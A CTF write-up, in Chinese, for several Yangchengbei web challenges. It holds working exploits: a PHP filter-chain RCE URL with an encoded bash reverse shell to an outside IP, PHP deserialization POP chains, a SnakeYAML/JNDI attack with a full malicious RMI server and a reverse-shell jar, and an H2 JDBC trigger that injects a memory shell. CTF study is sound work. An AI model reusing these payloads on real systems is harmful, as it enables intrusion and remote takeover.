羊城杯
rce_me
文件包含,但是有过滤,可以直接URL编码绕过黑名单。直接用php lfi的终极payload直接打:
/?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.GBK.UTF-8|convert.iconv.IEC%5fP27-1.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859%5f4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT%5fJISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT%5fJISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CN.ISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859%5f3.UTF16|convert.iconv.863.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd&1=system('echo+YmFzaCAtaSA%2bJi9kZXYvdGNwLzQ3Ljk2LjE3My4xMTYvMjMzMyAwPiYx|base64+-d|bash')%3b反弹shell权限不够读flag。找suid文件
find / -perm -u=s -type f 2>/dev/null发现date,直接
date -f /flagstep_by_step-v3
简单的反序列化。exp.php
<?php
class cheng
{
public $c1;
public function __construct($c1)
{
$this->c1 = $c1;
}
}
class bei
{
public $b1;
public function __construct()
{
$this->b1 = new yang();
}
}
class yang
{
public $y1;
public function __construct()
{
$this->y1 = "phpinfo";
}
}
echo urlencode(serialize(new cheng(new bei())));有个文件上传,但是黑名单不知道,没啥想法,看了一下phpinfo,结果flag就在phpinfo里面
Safepop
又是反序列化。需要绕过 throw,还要绕过wakeup。想到天翼杯的一道绕过方法,只要在反序列化数据中加入额外的属性即可绕过wakeup。payload:
a%3A1%3A%7Bi%3A0%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A10%3A%22cat+%2Fflag%3F%22%3Bs%3A1%3A%22a%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22Fun%22%3A2%3A%7Bs%3A9%3A%22%00Fun%00func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3BO%3A4%3A%22Test%22%3A0%3A%7B%7D%7D;%7D%7D%7D 在最后的第二个 } 后面加个分号即可绕过即
直接rce。pop链的exp.php:
<?php
class Fun
{
private $func = 'system';
public function __construct()
{
$this->p = new Test();
}
}
class B
{
public $p;
public function __construct()
{
$this->p = "cat /flag?";
$this->a = new A();
}
}
class Test{
public function __construct()
{
}
}
class A {
public $a;
public function __construct()
{
$this->a = new Fun();
}
}
$a = array(new B());
echo urlencode(serialize($a));simple_json(复现)
java杀我。没想到学了这么久java,还是写不出题,还是太菜了。。。题目给了payload,考的是绕过高版本jndi注入,之前的Dest0g3 520迎新赛的ljctr就是考这个,没好好复现,直接吃大亏。整了一下午的snakeyaml,都没复现成,经典熬大夜头昏昏沉沉的。直接拿github的payload:https://github.com/artsploit/yaml-payload
下载下来修改里面的exp:
public AwesomeScriptEngineFactory() {
try {
Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4xNzMuMTE2LzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}");
} catch (IOException e) {
e.printStackTrace();
}
}然后需要在服务器上开一个rmi服务。直接被整麻了。本来打算手鲁一个,结果死活连不上,不懂啥原因。直接抄一波工具。改之前的jndi_tools.jar里面的RMI(修改el payload即可):
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.rmi.MarshalException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RMISocketFactory;
import java.rmi.server.UID;
import java.util.Arrays;
import java.util.Scanner;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import javax.net.ServerSocketFactory;
import org.apache.naming.ResourceRef;
public class YamlJNDI {
public static void main(String[] args) throws Exception {
int port = 6666;
int rmi = 1099;
String evilCode = "curl dnslog.wyzxxz.cn";
String type = "el-linux";
String hostname = "47.96.173.116";
// if (args.length < 3) {
// System.err.println("[-] Usage: java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 \"curl dnslog.cn\"");
// System.exit(-1);
// return;
// }
// if (args.length >= 3) {
// port = Integer.parseInt(args[0]);
// rmi = Integer.parseInt(args[1]);
// evilCode = args[2];
// try {
// type = args[3].toLowerCase();
// } catch (Exception e) {
// type = "el-linux";
// }
// }
try {
hostname = InetAddress.getLocalHost().getHostName();
} catch (Exception exception) {}
System.err.println("[-] rmi_port:" + String.valueOf(port) + ", socket_port:" + String.valueOf(rmi) + ", evilcode: " + evilCode);
while (true) {
try {
Long.valueOf(hostname.replace(".", ""));
break;
} catch (Exception e) {
System.out.println("[-] current hostname error: " + hostname);
Scanner sc = new Scanner(System.in);
System.out.println("[-] please enter new hostname(ip)");
System.out.print("> ");
hostname = sc.nextLine().trim();
}
}
System.setProperty("java.rmi.server.hostname", hostname);
System.err.println("[-] use payload: rmi://" + hostname + ":" + String.valueOf(port) + "/Object");
ServerSocket ss = null;
SMRMISocket SMSS = new SMRMISocket();
SMSS.setPort(rmi);
try {
RMISocketFactory.setSocketFactory(SMSS);
System.out.println("[-] Creating SocketFactory on port " + String.valueOf(rmi));
} catch (Exception localException) {
localException.printStackTrace();
System.out.println("error in SMRMISocket");
}
Registry registry = LocateRegistry.createRegistry(port);
System.out.println("[-] Creating evil RMI registry on port " + String.valueOf(port));
try {
if (type.startsWith("el-")) {
ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "",
true, "org.apache.naming.factory.BeanFactory", null);
String yaml = "!!javax.script.ScriptEngineManager [\n" +
" !!java.net.URLClassLoader [[\n" +
" !!java.net.URL [\"http://47.96.173.116:8000/yaml-payload.jar\"]\n" +
" ]]\n" +
"]";
ref.add(new StringRefAddr("forceString", "a=load"));
if (type.endsWith("linux")) {
ref.add(new StringRefAddr("a", yaml));
} else if (type.endsWith("win")) {
ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd.exe','/c','" + evilCode + "']).start()\")"));
} else {
ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('" + evilCode + "')\")"));
}
ReferenceWrapper referenceWrapper = new ReferenceWrapper((Reference)ref);
registry.bind("Object", referenceWrapper);
} else if (type.equals("groovy")) {
ResourceRef ref = new ResourceRef("groovy.lang.GroovyClassLoader", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
ref.add(new StringRefAddr("forceString", "x=parseClass"));
String script = "@groovy.transform.ASTTest(value={\n assert java.lang.Runtime.getRuntime().exec(\"" + evilCode + "\")\n})\ndef x\n";
ref.add(new StringRefAddr("x", script));
ReferenceWrapper referenceWrapper = new ReferenceWrapper((Reference)ref);
registry.bind("Object", referenceWrapper);
} else {
System.err.println("[-] Usage: java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 \"curl dnslog.cn\" el-win/el-linux/groovy");
System.exit(-1);
return;
}
ss = SMSS.getSS();
handleSocket(ss);
} catch (Exception e) {
System.out.println("error. " + e.getMessage());
}
System.out.println("[-] end.");
}
private static void handleSocket(ServerSocket ss) {
Socket s = null;
try {
System.out.println("[-] waiting target connect RMI SocketFactory ...");
while ((s = ss.accept()) != null) {
InetSocketAddress remote = (InetSocketAddress)s.getRemoteSocketAddress();
System.err.println("[*] Have connection from " + remote);
InputStream is = s.getInputStream();
InputStream bufIn = is.markSupported() ? is : new BufferedInputStream(is);
bufIn.mark(4);
try {
DataInputStream in = new DataInputStream(bufIn);
int magic = in.readInt();
short version = in.readShort();
if (magic != 1246907721 || version != 2) {
s.close();
continue;
}
OutputStream sockOut = s.getOutputStream();
BufferedOutputStream bufOut = new BufferedOutputStream(sockOut);
try {
DataOutputStream out = new DataOutputStream(bufOut);
byte protocol = in.readByte();
switch (protocol) {
case 75:
out.writeByte(78);
if (remote.getHostName() != null) {
out.writeUTF(remote.getHostName());
} else {
out.writeUTF(remote.getAddress().toString());
}
out.writeInt(remote.getPort());
out.flush();
in.readUTF();
in.readInt();
case 76:
doMessage(s, in, out);
break;
default:
System.err.println("Unsupported protocol");
s.close();
continue;
}
bufOut.flush();
out.flush();
} catch (Exception e) {
e.printStackTrace();
}
} catch (Exception e) {
e.printStackTrace();
}
System.err.println("[*] Start send evil code to " + remote.getHostName());
}
} catch (Exception e) {
e.printStackTrace();
}
}
public static class SMRMISocket extends RMISocketFactory {
private ServerSocket ss;
private int port = 53;
public Socket createSocket(String host, int port) throws IOException {
return new Socket(host, port);
}
public ServerSocket createServerSocket(int port) throws IOException {
if (port == 0)
port = this.port;
this.ss = ServerSocketFactory.getDefault().createServerSocket(port);
return this.ss;
}
public ServerSocket getSS() {
return this.ss;
}
private void setPort(int port) {
this.port = port;
}
}
private static boolean handleRMI(ObjectInputStream ois, DataOutputStream out) throws Exception {
int method = ois.readInt();
ois.readLong();
if (method != 2)
return false;
String object = (String)ois.readObject();
System.err.println("[*] Is RMI.lookup call for " + object + " " + method);
return true;
}
private static void doMessage(Socket s, DataInputStream in, DataOutputStream out) throws Exception {
System.err.println("[*] Reading message...");
int op = in.read();
switch (op) {
case 80:
doCall(in, out);
break;
case 82:
out.writeByte(83);
break;
case 84:
UID.read(in);
break;
default:
throw new IOException("unknown transport op " + op);
}
s.close();
}
private static void doCall(DataInputStream in, DataOutputStream out) throws Exception {
ObjID read;
ObjectInputStream ois = new ObjectInputStream(in) {
protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
if ("[Ljava.rmi.server.ObjID;".equals(desc.getName()))
return ObjID[].class;
if ("java.rmi.server.ObjID".equals(desc.getName()))
return ObjID.class;
if ("java.rmi.server.UID".equals(desc.getName()))
return UID.class;
if ("java.lang.String".equals(desc.getName()))
return String.class;
throw new IOException("Not allowed to read object");
}
};
try {
read = ObjID.read(ois);
} catch (IOException e) {
throw new MarshalException("unable to read objID", e);
}
if (read.hashCode() == 2) {
handleDGC(ois);
} else if (read.hashCode() == 0) {
handleRMI(ois, out);
}
}
private static void handleDGC(ObjectInputStream ois) throws IOException, ClassNotFoundException {
ois.readInt();
ois.readLong();
System.err.println("[-] Is DGC call for " + Arrays.toString((Object[])ois.readObject()));
}
}
然后直接打成jar包,pom.xml:
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.example</groupId>
<artifactId>snakeyaml_jndi</artifactId>
<version>1.0</version>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
<executions>
<execution>
<goals>
<goal>repackage</goal>
</goals>
</execution>
</executions>
</plugin>
</plugins>
</build>
<dependencies>
<dependency>
<groupId>org.apache.tomcat.embed</groupId>
<artifactId>tomcat-embed-core</artifactId>
<version>9.0.30</version>
<scope>compile</scope>
</dependency>
</dependencies>
<properties>
<maven.compiler.source>1.8</maven.compiler.source>
<maven.compiler.target>1.8</maven.compiler.target>
</properties>
</project>传到vps直接运行。然后把上面的yaml_payload.jar开启http服务即可。最后payload:
{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"rmi://47.96.173.116:6666/Object"}, "msg":{"$ref":"$.content.context"}}little_jvav(学不会)
没见过的东西,暂时找到一篇类似的文章:https://packetstormsecurity.com/files/165676/H2-Database-Console-Remote-Code-Execution.html
参考wp:https://mp.weixin.qq.com/s?srcid=0905PwTfAcHT1P2oIwXe0vSZ&scene=23&sharer_sharetime=1662358159364&mid=2247492779&sharer_shareid=af08bc9c7653e427562dda803abf19d6&sn=5ce1044c52f412c8b47c7ffccb4818c5&idx=1&__biz=MzIzMTQ4NzE2Ng%3D%3D&chksm=e8a1c77adfd64e6c01f21ab1de8a502c2a47a4d09a4cea289bb58ae725f64bb266b9e8db3d8e&mpshare=1#rd
找不到啥有关的文章,那就先射箭再画靶。直接拿wp的exp跑一遍,本地跑一下。
稍微修改了一下,用Interceptor内存马,具体就是网鼎杯那个ssti的那里的Test和内存马代码:https://47.96.173.116/2022/08/27/%e7%bd%91%e9%bc%8e%e6%9d%af/#header-id-4
package ycb;
import javassist.ClassPool;
import ycb.tool.SecurityHelper;
import java.util.Base64;
public class Exp {
public static void main(String[] args) throws Exception {
// org.springframework.cglib.core.ReflectUtils.defineClass("ycb.Test",java.util.Base64.getDecoder().decode("yv66vgAAADQAYAoAFQAtCQAuAC8IADAKADEAMgoAMwA0CAA1CwA2ADcHADgIADkLAAgAOgcAOwgAJAoAPAA9CgA+AD8KAD4AQAcAQQcAQgoAEQAtCgAQAEMHAEQHAEUBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACkx5Y2IvVGVzdDsBAAhkb0luamVjdAEAB2NvbnRleHQBADdMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQ7AQAWYWJzdHJhY3RIYW5kbGVyTWFwcGluZwEAQExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L2hhbmRsZXIvQWJzdHJhY3RIYW5kbGVyTWFwcGluZzsBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBABNhZGFwdGVkSW50ZXJjZXB0b3JzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAKUxqYXZhL3V0aWwvQXJyYXlMaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQAKRXhjZXB0aW9ucwcARgcARwEAClNvdXJjZUZpbGUBAAlUZXN0LmphdmEMABYAFwcASAwASQBKAQAHc3VjY2VzcwcASwwATABNBwBODABPAFABADlvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5zZXJ2bGV0LkRpc3BhdGNoZXJTZXJ2bGV0LkNPTlRFWFQHAFEMAFIAUwEANW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0AQAccmVxdWVzdE1hcHBpbmdIYW5kbGVyTWFwcGluZwwAVABVAQA+b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9oYW5kbGVyL0Fic3RyYWN0SGFuZGxlck1hcHBpbmcHAFYMAFcAWAcAWQwAWgBbDABcAF0BABNqYXZhL3V0aWwvQXJyYXlMaXN0AQAVeWNiL3dlYi9DbWRDb250cm9sbGVyDABeAF8BAAh5Y2IvVGVzdAEAEGphdmEvbGFuZy9PYmplY3QBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24BACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAPG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0Q29udGV4dEhvbGRlcgEAGGN1cnJlbnRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBADlvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXMBAAxnZXRBdHRyaWJ1dGUBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL09iamVjdDsBAAdnZXRCZWFuAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAA9qYXZhL2xhbmcvQ2xhc3MBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQADYWRkAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaACEAFAAVAAAAAAACAAEAFgAXAAEAGAAAADMAAQABAAAABSq3AAGxAAAAAgAZAAAACgACAAAADAAEAA0AGgAAAAwAAQAAAAUAGwAcAAAAAQAdABcAAgAYAAAAyAADAAUAAABIsgACEgO2AAS4AAUSBgO5AAcDAMAACEwrEgm5AAoCAMAAC00SCxIMtgANTi0EtgAOLSy2AA/AABA6BBkEuwARWbcAErYAE1exAAAAAwAZAAAAIgAIAAAAEAAIABEAFwASACMAEwArABQAMAAVADoAFgBHABcAGgAAADQABQAAAEgAGwAcAAAAFwAxAB4AHwABACMAJQAgACEAAgArAB0AIgAjAAMAOgAOACQAJQAEACYAAAAMAAEAOgAOACQAJwAEACgAAAAGAAIAKQAqAAEAKwAAAAIALA=="),org.springframework.util.ClassUtils.getDefaultClassLoader()).newInstance().doInject();
// byte[] bytes = ClassPool.getDefault().get("ycb.Test").toBytecode();
// byte[] base64 = Base64.getEncoder().encode(bytes);
// System.out.println(new String(base64));
String out ;
out = SecurityHelper.encrypt("n3k0","destoryDataSource");
System.out.println(out);
out = SecurityHelper.encrypt("n3k0","createPool");
System.out.println(out);
String split_str = "#&DS_SPLITTAG&#";
// String[] paramsStr = new String[]{"druid","mysql","com.mysql.cj.jdbc.Driver","jdbc:mysql://120.26.59.137:3309/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.Se rverStatusDiffInterceptor&autoDeserialize=true","linux_passwd","admin","druid","10","10 ","1"};
String[] paramsStr = new String[]{"druid","mysql","org.h2.Driver",
"jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER edi BEFORE SELECT ON\n" +
"INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
"org.springframework.cglib.core.ReflectUtils.defineClass(\"ycb.Test\",java.util.Base64.getDecoder().decode(\"yv66vgAAADQAYAoAFQAtCQAuAC8IADAKADEAMgoAMwA0CAA1CwA2ADcHADgIADkLAAgAOgcAOwgAJAoAPAA9CgA+AD8KAD4AQAcAQQcAQgoAEQAtCgAQAEMHAEQHAEUBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACkx5Y2IvVGVzdDsBAAhkb0luamVjdAEAB2NvbnRleHQBADdMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQ7AQAWYWJzdHJhY3RIYW5kbGVyTWFwcGluZwEAQExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L2hhbmRsZXIvQWJzdHJhY3RIYW5kbGVyTWFwcGluZzsBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBABNhZGFwdGVkSW50ZXJjZXB0b3JzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAKUxqYXZhL3V0aWwvQXJyYXlMaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQAKRXhjZXB0aW9ucwcARgcARwEAClNvdXJjZUZpbGUBAAlUZXN0LmphdmEMABYAFwcASAwASQBKAQAHc3VjY2VzcwcASwwATABNBwBODABPAFABADlvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5zZXJ2bGV0LkRpc3BhdGNoZXJTZXJ2bGV0LkNPTlRFWFQHAFEMAFIAUwEANW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0AQAccmVxdWVzdE1hcHBpbmdIYW5kbGVyTWFwcGluZwwAVABVAQA+b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9oYW5kbGVyL0Fic3RyYWN0SGFuZGxlck1hcHBpbmcHAFYMAFcAWAcAWQwAWgBbDABcAF0BABNqYXZhL3V0aWwvQXJyYXlMaXN0AQAVeWNiL3dlYi9DbWRDb250cm9sbGVyDABeAF8BAAh5Y2IvVGVzdAEAEGphdmEvbGFuZy9PYmplY3QBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24BACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAPG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0Q29udGV4dEhvbGRlcgEAGGN1cnJlbnRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBADlvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXMBAAxnZXRBdHRyaWJ1dGUBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL09iamVjdDsBAAdnZXRCZWFuAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAA9qYXZhL2xhbmcvQ2xhc3MBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQADYWRkAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaACEAFAAVAAAAAAACAAEAFgAXAAEAGAAAADMAAQABAAAABSq3AAGxAAAAAgAZAAAACgACAAAADAAEAA0AGgAAAAwAAQAAAAUAGwAcAAAAAQAdABcAAgAYAAAAyAADAAUAAABIsgACEgO2AAS4AAUSBgO5AAcDAMAACEwrEgm5AAoCAMAAC00SCxIMtgANTi0EtgAOLSy2AA/AABA6BBkEuwARWbcAErYAE1exAAAAAwAZAAAAIgAIAAAAEAAIABEAFwASACMAEwArABQAMAAVADoAFgBHABcAGgAAADQABQAAAEgAGwAcAAAAFwAxAB4AHwABACMAJQAgACEAAgArAB0AIgAjAAMAOgAOACQAJQAEACYAAAAMAAEAOgAOACQAJwAEACgAAAAGAAIAKQAqAAEAKwAAAAIALA==\"),org.springframework.util.ClassUtils.getDefaultClassLoader()).newInstance().doInject()\n"+ "$$\n"
,"root","admin","druid","10","10","1"};
String type = paramsStr[0];
String poolName = paramsStr[1];
String driverClasses = paramsStr[2];
String turl = paramsStr[3];
String user = paramsStr[4];
String password = paramsStr[5];
String provider = paramsStr[6];
String maxconn = paramsStr[7];
String minconn = paramsStr[8];
String usepool = paramsStr[9];
String tmp_s = "";
for (int i = 0; i < paramsStr.length; i++) {
tmp_s+=paramsStr[i]+split_str;
}
System.out.println(tmp_s);
out = SecurityHelper.encrypt("n3k0",tmp_s);
System.out.println(out);
out = SecurityHelper.encrypt("n3k0","mysql");
System.out.println(out);
}
}由于js代码不能有分号,我直接把那篇文章的js代码整成一行了。。。
